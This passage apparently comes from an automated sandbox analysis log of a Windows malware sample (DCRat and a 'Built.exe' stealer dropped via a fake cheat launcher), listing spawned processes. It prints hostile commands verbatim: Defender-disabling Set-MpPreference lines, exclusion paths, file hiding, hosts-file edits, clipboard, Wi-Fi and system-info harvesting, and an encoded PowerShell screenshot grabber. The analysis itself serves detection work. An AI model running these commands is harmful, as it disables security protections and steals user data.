wAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeProcess created: C:\Users\user\AppData\Local\Temp\x12.exe "C:\Users\user\AppData\Local\Temp\x12.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeProcess created: C:\Users\user\AppData\Local\Temp\x11.exe "C:\Users\user\AppData\Local\Temp\x11.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeProcess created: C:\Users\user\AppData\Local\Temp\x10.exe "C:\Users\user\AppData\Local\Temp\x10.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeProcess created: C:\Users\user\AppData\Local\Temp\x9.exe "C:\Users\user\AppData\Local\Temp\x9.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeProcess created: C:\Users\user\AppData\Local\Temp\x8.exe "C:\Users\user\AppData\Local\Temp\x8.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeProcess created: C:\Users\user\AppData\Local\Temp\x7.exe "C:\Users\user\AppData\Local\Temp\x7.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeProcess created: C:\Users\user\AppData\Local\Temp\x6.exe "C:\Users\user\AppData\Local\Temp\x6.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeProcess created: C:\Users\user\AppData\Local\Temp\x5.exe "C:\Users\user\AppData\Local\Temp\x5.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeProcess created: C:\Users\user\AppData\Local\Temp\x4.exe "C:\Users\user\AppData\Local\Temp\x4.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x4.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe "C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
